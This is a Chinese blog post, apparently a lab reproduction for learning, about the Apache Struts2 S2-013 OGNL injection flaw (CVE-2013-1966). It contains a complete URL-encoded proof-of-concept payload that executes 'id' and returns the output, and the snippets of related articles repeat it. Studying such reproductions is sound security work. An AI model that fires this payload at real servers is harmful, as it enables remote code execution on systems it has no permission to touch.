struts2远程S2-013复现学习

最新推荐文章于 2024-04-06 10:48:21 发布
最新推荐文章于 2024-04-06 10:48:21 发布
阅读量365 收藏
点赞数
分类专栏: 安全 渗透测试 文章标签: 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HKlearner/article/details/123901641
版权
本文探讨了Struts2框架中<s:a>和<s:url>标签的includeParams属性可能导致的命令注入问题,通过实例演示了如何利用OGNL表达式解析参数进行恶意操作,并重点介绍了漏洞影响范围和PoC构建方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-013复现

原理

struts2的标签中 和 都有一个 includeParams 属性,可以设置成如下值

none - URL中不包含任何参数(默认)
get - 仅包含URL中的GET参数
all - 在URL中包含GET和POST参数
此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行

影响版本:Struts 2.0.0-2.3.14

漏洞搭建

Struts2 的标签<s:a><s:url>提供了一个 includeParams 属性。该属性的主要作用域是了解是否包含 http 请求参数。

includeParams 的允许值为:

  1. none - 在 URL 中不包含任何参数(默认)
  2. get - 在 URL 中仅包含 GET 参数
  3. all - 在 URL 中包含 GET 和 POST 参数

当 时includeParams=all,这个请求的 GET 和 POST 参数放在 URL 的 GET 参数上。在此过程中,参数将被 OGNL 表达式解析。它导致命令执行。

poc构建

a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-013(CVE-2013-1966)
qq_51577576的博客
11-24 692
Struts2标签中和都包含一个includeParams属性,其值可设置为none、get 或 all,其对应意义分别为,none:链接不包含请求的任意参数值(默认),get:链接只包含GET请求中的参数和其值,all:链接包含GET和POST所有参数和其值.用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上.这个参数会进行OGNL表达式解析,从而可以插入任意OGNL表达式导致任意代码执行
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1749
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Struts2 S2-013复现
ZJT6666666的博客
12-22 341
Struts2 S2-013复现
[struts2]s2-013 漏洞复现
satasun的博客
12-09 879
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
0x19.Apache Struts2远程代码执行漏洞(S2-013)
qq_31679787的博客
09-27 423
通过构造payload执行命令; payload:%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%2C%23b%3Dnew%20ja...
漏洞复现----33、Struts2/S2-013/S2-014
七天
06-29 630
文章目录一、漏洞原理二、环境启动三、漏洞复现四、S2-014 一、漏洞原理 S2-013Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,可以设置成如下值: 1、none - URL中不包含任何参数(默认) 2、get - 仅包含URL中的GET参数 3、all - 在URL中包含GET和POST参数此时 或尝试去解析原始请求参数时,会导致OGNL表达式的执行 需要在JSP页面中将s:url、s:a标签中的includeP
【Vulfocus解题复现Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 3055
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1395
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1260
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12),struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
S2-013的一次逐步复现分析
jary__D的博客
11-27 591
站在巨人的肩膀上,嚼烂了分析漏洞
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2远程代码执行漏洞分析(S2-013)1
CVE-2012-4969漏洞分析
02-29
CVE-2012-4969漏洞分析,详细的分析了该漏洞的造成原因!
墨者Apache Struts2远程代码执行漏洞(S2-013)复现题解
zr1213159840的博客
01-15 1866
首先查找到漏洞的相关利用信息,链接如下: https://vulhub.org/#/environments/struts2/s2-013/ 能看到poc如下: ?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStrea
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1794
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
buuctf [struts2]s2-013
qq_1873822的博客
03-16 957
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
[漏洞复现]Apache Struts2/S2-013 (CVE-2013-1966)
k5664524的博客
01-17 1077
2.3.1.2 之前的 Apache Struts 允许远程攻击者绕过 ParameterInterceptor 类中的安全保护并执行任意命令。
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1930
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
vulhub中Struts2-013/Struts2-014 远程代码执行漏洞复现
yougexiaojiuguan的博客
04-06 598
漏洞复现过程的记录
Struts 2中的constant配置详解
hello world!
12-21 1044
通过对这些属性的配置,可以改变Struts 2 框架的一些默认行为,这些配置可以在struts.xml文件中完成,也可以在struts.properties文件中完成 1.  指定Web应用的默认编码集,相当于调用 HttpServletRequest的setCharacterEncoding方法。 2. 该属性设置是否每次HTTP请求到达时,系统都重新加载资源文件。该属性默认
Apache Struts2 远程命令执行 (S2-052
最新发布
03-15
### 关于 Apache Struts2 S2-052 漏洞的原因及修复方案 #### 一、漏洞概述 Apache Struts2 S2-052 是一种远程代码执行漏洞,其根本原因在于 Struts 的 `Result` 类型配置不当。当应用程序使用基于 OGNL 表达式的动态方法调用功能时,如果未正确处理用户输入,则可能导致恶意攻击者通过构造特定的 HTTP 请求,在服务器端执行任意代码[^1]。 #### 二、漏洞成因分析 S2-052 漏洞的核心问题是由于 Struts2 对用户提交的数据缺乏严格的过滤机制。具体来说: - 攻击者可以通过 URL 参数注入 OGNL 表达式。 - 如果这些表达式被错误解析并被执行,则可能触发远程代码执行行为。 - 特别是在某些情况下,Struts2 默认启用了动态方法调用(Dynamic Method Invocation, DMI),这进一步扩大了攻击面[^4]。 #### 三、影响范围 此漏洞主要影响以下版本的 Apache Struts2- **Struts 2.3.x 系列**:从 2.3 到 2.3.33。 - **Struts 2.5.x 系列**:从 2.5 到 2.5.12。 #### 四、修复建议 为了防止此类漏洞带来的安全风险,官方推荐采取以下措施: 1. **升级框架版本** 升级至不受影响的安全版本是最直接有效的解决方案。对于不同分支的具体修复版本如下: -Struts2 更新到 **2.3.34 或更高版本**。 - 或者更新到 **2.5.13 或更高版本**[^2]。 2. **禁用动态方法调用 (DMI)** 动态方法调用是一个潜在的风险点,因此可以考虑关闭该特性。在应用的全局配置文件 (`struts.xml`) 中设置参数: ```xml <constant name="struts.enable.DynamicMethodInvocation" value="false"/> ``` 3. **加强输入验证** 配置白名单策略以限制合法字符集,并对所有外部输入数据进行全面校验。例如,移除任何非法字符或特殊语法结构(如 `${}` 和 `%{}` 序列)。 4. **启用 WAF 防护** 使用 Web 应用防火墙(WAF)拦截可疑流量模式,特别是那些包含典型 OGNL 注入特征码的请求路径[^5]。 #### 五、复现环境搭建指南 若需测试漏洞是否存在以及验证补丁效果,可通过以下方式快速构建实验场景: ```bash cd /path/to/vulhub/struts2/specific-vulnerability/ docker-compose build && docker-compose up -d ``` 上述命令会启动一个预设好的 Ubuntu 虚拟机实例,其中安装了存在缺陷的目标服务程序供研究学习之用[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

脚本实习生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值